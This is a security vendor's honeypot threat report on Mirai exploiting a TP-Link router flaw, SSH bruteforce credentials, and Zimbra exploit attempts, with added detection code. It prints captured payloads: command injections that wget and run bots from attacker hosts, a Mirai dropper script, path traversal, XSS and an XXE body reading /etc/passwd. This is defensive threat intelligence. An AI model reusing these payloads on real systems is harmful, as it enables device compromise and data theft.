The following report consists of TEHTRIS observations on our worldwide honeypot network, to give you a view of what is going on on the Internet. This actionable cyber threat intelligence is based on observations from a real and uncontrolled environment. Keeping track of trends, and of what threat actors actively scan for during their reconnaissance phase, allows the cybersecurity posture to be adjusted accordingly.
Check out our previous report here.
Mirai botnet exploiting CVE-2023-1389 in TP-Link Archer AX21
During the past weeks, we monitored attempts to exploit CVE-2023-1389 in the TP-Link Archer AX21 router, disclosed earlier this year. This command injection vulnerability allows an unauthenticated attacker to inject commands with a single POST request; the commands run as root. We observed a peak on November 29th.
In our case, TEHTRIS Deceptive Response captured two different requests:
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; rm -rf shk; wget http[:]//45.95.146[.]26/shk; chmod 777 shk; ./shk tplink; rm -rf shk`)
/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd /tmp; for pid in $(ls /proc | grep -E '^[0-9]+$'); do grep -q '(deleted)' /proc/$pid/maps && kill -9 $pid || true; done; rm -rf lol; wget http[:]//94.156.68[.]152/lol; chmod 777 lol; ./lol tplink; rm -rf lol`)
Both 45.95.146[.]26 and 94.156.68[.]152 are known to be associated with the Mirai botnet, and indeed this vulnerability was added to the botnet's arsenal in May 2023. The files the two requests try to download are:
- shk (sha256 3ab790c0cd48d52b5d87a60b54cdd2b8ee07b9e21c84468564792670691d6d03), a shell dropper that, for each architecture in a list, tries to fetch the matching payload with wget, curl or tftp, saves it as "system", makes it executable and runs it:
Content:
binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="45.95.146[.]26"
binname="miori"
binout="system"
exec="your device just got infected to a bootnoot"
rm -rf $binout
for arch in $binarys
cd /tmp
cd /var
cd /dev
wget http://$server_ip/$binname.$arch -O $binout
curl -O $binout http://$server_ip/$binname.$arch
tftp -g -l $binout -r $binname.$arch $server_ip
chmod 777 $binout
status=
./$binout $1
if [ "$status" = "$exec" ]
- lol (sha256 dd1a057b4e4ca17de8ea1a3f8b42caefcaa8529fc7e1e83b474ef70300add23d), similar to shk
IoCs
- 120.63.180[.]123 🇮🇳
- 185.224.128[.]160 🇳🇱
- 5.248.2[.]235 🇺🇦
- 185.224.128[.]31 🇳🇱
- 179.43.163[.]130 🇨🇭
- 45.95.146[.]26 🇳🇱
- 94.156.68[.]152 🇧🇬
SSH bruteforce attacks: ttx:ttx2011
SSH bruteforce attempts are relentless. In the past 30 days, the top 10 credentials used by threat actors are the following:
| Login | Password |
|---|---|
| 345gs5662d34 | 345gs5662d34 |
| admin | admin |
| root | root |
| ubnt | ubnt |
| 0 | 0 |
| root | password |
| root | admin |
| root | 123456 |
| root | 12345 |
| root | 3245gs5662d34 |
Between December 6th and 8th, we monitored a surge in connection attempts using credentials ttx:ttx2011 coming from 2,287 unique IP addresses.
According to security researchers, these credentials are used by ShellBot operators to compromise poorly secured Linux servers.
All of our honeypots were targeted by these bruteforce attempts. Taiwan, however, accounted for 20% of all hits, Indonesia for 13%, and Singapore and Thailand for 9% each.
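As an added example that is not part of the original report, here is how the two measurements above (the top credential pairs over a period, and a single pair sprayed from many source addresses inside a time window) can be computed from honeypot logs. The input is a handful of constructed Cowrie-style JSON lines; the field names (eventid, username, password, src_ip, timestamp) are assumed from Cowrie's JSON output, and the source addresses are RFC 5737 documentation addresses, not real attackers.

```python
import json
from collections import Counter, defaultdict
from datetime import datetime, timezone

# Constructed Cowrie-style log lines for this example. The last line sits
# outside the December 6-8 window on purpose.
SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","timestamp":"2023-12-06T10:00:01.000000Z","src_ip":"203.0.113.10","username":"ttx","password":"ttx2011"}
{"eventid":"cowrie.login.failed","timestamp":"2023-12-06T10:00:05.000000Z","src_ip":"203.0.113.11","username":"ttx","password":"ttx2011"}
{"eventid":"cowrie.login.failed","timestamp":"2023-12-06T10:00:09.000000Z","src_ip":"203.0.113.12","username":"ttx","password":"ttx2011"}
{"eventid":"cowrie.login.failed","timestamp":"2023-12-07T03:00:12.000000Z","src_ip":"198.51.100.7","username":"ttx","password":"ttx2011"}
{"eventid":"cowrie.login.failed","timestamp":"2023-12-08T22:00:20.000000Z","src_ip":"198.51.100.8","username":"ttx","password":"ttx2011"}
{"eventid":"cowrie.login.failed","timestamp":"2023-12-06T10:01:00.000000Z","src_ip":"203.0.113.50","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","timestamp":"2023-12-06T10:01:01.000000Z","src_ip":"203.0.113.50","username":"root","password":"12345"}
{"eventid":"cowrie.login.failed","timestamp":"2023-12-06T10:01:02.000000Z","src_ip":"203.0.113.50","username":"root","password":"password"}
{"eventid":"cowrie.login.failed","timestamp":"2023-12-06T10:01:03.000000Z","src_ip":"203.0.113.50","username":"root","password":"123456"}
{"eventid":"cowrie.login.success","timestamp":"2023-12-06T10:02:00.000000Z","src_ip":"203.0.113.77","username":"admin","password":"admin"}
{"eventid":"cowrie.session.connect","timestamp":"2023-12-06T10:02:00.000000Z","src_ip":"203.0.113.77","protocol":"ssh"}
{"eventid":"cowrie.login.failed","timestamp":"2023-12-09T08:00:00.000000Z","src_ip":"198.51.100.99","username":"ttx","password":"ttx2011"}
"""

WINDOW_START = datetime(2023, 12, 6, tzinfo=timezone.utc)
WINDOW_END = datetime(2023, 12, 9, tzinfo=timezone.utc)  # exclusive


def parse_login_events(text):
    """Yield login attempts (failed or successful) with a parsed UTC timestamp;
    connect/disconnect and command events are skipped."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if not ev.get("eventid", "").startswith("cowrie.login."):
            continue
        ev["ts"] = datetime.fromisoformat(ev["timestamp"].replace("Z", "+00:00"))
        yield ev


def in_window(events, start, end):
    """Keep events with start <= ts < end."""
    return [ev for ev in events if start <= ev["ts"] < end]


def top_credentials(events, n=10):
    """Most common login:password pairs, like the table in the report."""
    return Counter((ev["username"], ev["password"]) for ev in events).most_common(n)


def distributed_credentials(events, min_ips=3):
    """Credential pairs tried from at least min_ips distinct sources: the
    signature of a botnet spraying one pair, as opposed to one host guessing many."""
    sources = defaultdict(set)
    for ev in events:
        sources[(ev["username"], ev["password"])].add(ev["src_ip"])
    return {cred: len(ips) for cred, ips in sources.items() if len(ips) >= min_ips}


def report(text=SAMPLE_LOG, start=WINDOW_START, end=WINDOW_END):
    events = in_window(list(parse_login_events(text)), start, end)
    return {"top": top_credentials(events, 5), "surges": distributed_credentials(events)}


if __name__ == "__main__":
    r = report()
    for (user, pw), count in r["top"]:
        print(f"{user}:{pw}\t{count}")
    for (user, pw), n_ips in r["surges"].items():
        print(f"surge: {user}:{pw} from {n_ips} unique IPs")
```

Counting unique source addresses per pair, rather than raw attempts, is what separates the ttx:ttx2011 pattern from an ordinary single-host dictionary run: root:123456 appears twice in the sample but from one address only, so it is not reported as a surge.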
IoCs
- 170.64.208[.]208
- 117.6.44[.]221
- 186.67.248[.]6
- 188.18.49[.]50
- 202.83.16[.]8
- 27.131.36[.]170
- 43.153.35[.]39
- 103.76.123[.]85
- 118.70.170[.]120
- 129.226.83[.]30
Attempts to exploit vulnerabilities in older versions of Zimbra
Zimbra is a collaboration suite that includes an email server and a web client. It is a frequent target: just recently, researchers reported that a zero-day flaw tracked as CVE-2023-37580 (CVSS3 6.1) was exploited in the wild against international government organisations. Older Zimbra vulnerabilities are still being used for initial access as well. Over the past two weeks, we observed two IP addresses attempting to exploit three Zimbra vulnerabilities:
- CVE-2013-7091 (CVSS N/A), a directory traversal vulnerability in Zimbra 7.2.2 and 8.0.2 allowing attackers to read arbitrary files. The exploit is available with Metasploit.
URL: /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
- CVE-2018-14013 (CVSS3 6.1), a cross-site scripting (XSS) vulnerability in versions before 8.8.11
URL (decoded):
/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action&cso=0&id=""></script><script>alert(document.domain)</script>
- CVE-2019-9670 (CVSS3 9.8), an XML External Entity Injection (XXE) vulnerability. The exploit is available with Metasploit.
URL: Autodiscover/Autodiscover.xml
Raw data (request body):
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
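Added example, not code from the report: a request classifier covering the three patterns above, for triaging the same attempts in reverse-proxy or honeypot logs. It URL-decodes the target repeatedly to catch double encoding, flags a traversal or NUL byte in the skin parameter of the /res/ resource loader (CVE-2013-7091), script injection in the query of /zimbra/h/search (CVE-2018-14013), and a DOCTYPE carrying an external entity in an Autodiscover POST body (CVE-2019-9670), and returns the CVE together with the file or entity targeted. The three captured requests are embedded as input along with two benign requests constructed here; the function and variable names are ours.

```python
import re
from urllib.parse import unquote

# Signatures for the three Zimbra exploit attempts seen by the honeypots.
RES_LOADER_RE = re.compile(r"^/res/.*\.js\.zgz$")  # CVE-2013-7091 entry point
SKIN_RE = re.compile(r"[?&]skin=([^&]*)")
XSS_RE = re.compile(r"<\s*/?\s*script\b|\bon\w+\s*=|javascript:", re.I)
DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.I)
EXT_ENTITY_RE = re.compile(r'<!ENTITY\s+\w+\s+(?:SYSTEM|PUBLIC)\s+"([^"]*)"', re.I)

# (method, target, body) for the three captured requests, as shown in the report,
# followed by two constructed benign requests to the same endpoints.
CAPTURED = [
    ("GET", "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00", ""),
    ("GET", '/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action&cso=0&id=""></script><script>alert(document.domain)</script>', ""),
    ("POST", "/Autodiscover/Autodiscover.xml",
     '<!DOCTYPE xxe [\n<!ELEMENT name ANY >\n<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
     '<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">\n'
     "<Request>\n<EMailAddress>aaaaa</EMailAddress>\n"
     "<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>\n</Request>\n</Autodiscover>"),
]
BENIGN = [
    ("GET", "/res/I18nMsg,AjxMsg.js.zgz?v=091214175450&skin=harmony", ""),
    ("POST", "/Autodiscover/Autodiscover.xml",
     "<Autodiscover><Request><EMailAddress>user@example.org</EMailAddress></Request></Autodiscover>"),
]


def decode(target, rounds=3):
    """URL-decode until stable (at most rounds times) so that double-encoded
    ../ sequences and %00 are seen the way the server will see them."""
    for _ in range(rounds):
        new = unquote(target)
        if new == target:
            break
        target = new
    return target


def classify_request(method, target, body=""):
    """Return (cve, detail) for a known Zimbra exploit pattern, else None.
    target is path+query as seen on the wire; body is the raw request body."""
    path, _, query = decode(target).partition("?")
    if RES_LOADER_RE.match(path):
        m = SKIN_RE.search("?" + query)
        skin = m.group(1) if m else ""
        if "../" in skin or "\x00" in skin:
            # The NUL byte truncates the expected ".xml" suffix appended by the server.
            return ("CVE-2013-7091", skin.rstrip("\x00"))
    if path == "/zimbra/h/search":
        m = XSS_RE.search(query)
        if m:
            return ("CVE-2018-14013", m.group(0))
    if (method.upper() == "POST"
            and path.lower().endswith("/autodiscover/autodiscover.xml")
            and DOCTYPE_RE.search(body)):
        # A DOCTYPE has no business in an Autodiscover request at all; report the
        # external entity target if one is declared.
        m = EXT_ENTITY_RE.search(body)
        return ("CVE-2019-9670", m.group(1) if m else "inline DOCTYPE")
    return None


def triage(requests):
    """Classify a list of (method, target, body) tuples; keep only the hits."""
    hits = []
    for idx, req in enumerate(requests):
        hit = classify_request(*req)
        if hit:
            hits.append((idx, hit))
    return hits


if __name__ == "__main__":
    for idx, (cve, detail) in triage(CAPTURED + BENIGN):
        print(f"request {idx}: {cve} -> {detail!r}")
```

The Autodiscover rule deliberately keys on the presence of a DOCTYPE rather than on `file:///etc/passwd`: the same XXE works with any local path or an http:// URL for out-of-band exfiltration, and a legitimate client never sends a DTD in this request.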
IoCs
- 83.97.73[.]87
- 52.87.238[.]153
Exploit attempts against Zeroshell
Want to learn more on this subject?
More insights on this research issued from the alerts on our worldwide honeypots network.
Subscribe to our bi-monthly threat intelligence newsletter
Where do most attacks come from?
Information remains TEHTRIS' sole property and reproduction is forbidden
TEHTRIS is and remains sole property rights owner of the information provided herein. Any copy, modification, derivative work, associated document, as well as every intellectual property right, is and must remain TEHTRIS’ sole and exclusive property. TEHTRIS authorizes the user to access for read use only. Except as expressly provided above, nothing contained herein will be construed as conferring any license or right under any TEHTRIS’ copyright.
No warranty and liability
TEHTRIS will not be held liable for any use, improper or incorrect use of the information described and/or contained herein and assume no responsibility for anyone’s use of the information. Although every effort has been made to provide complete and accurate information, TEHTRIS makes no warranty, expressed or implied regarding accuracy, adequacy, completeness, legality, reliability, or usefulness of any information provided herein. This disclaimer applies to both isolated and aggregated uses of the information.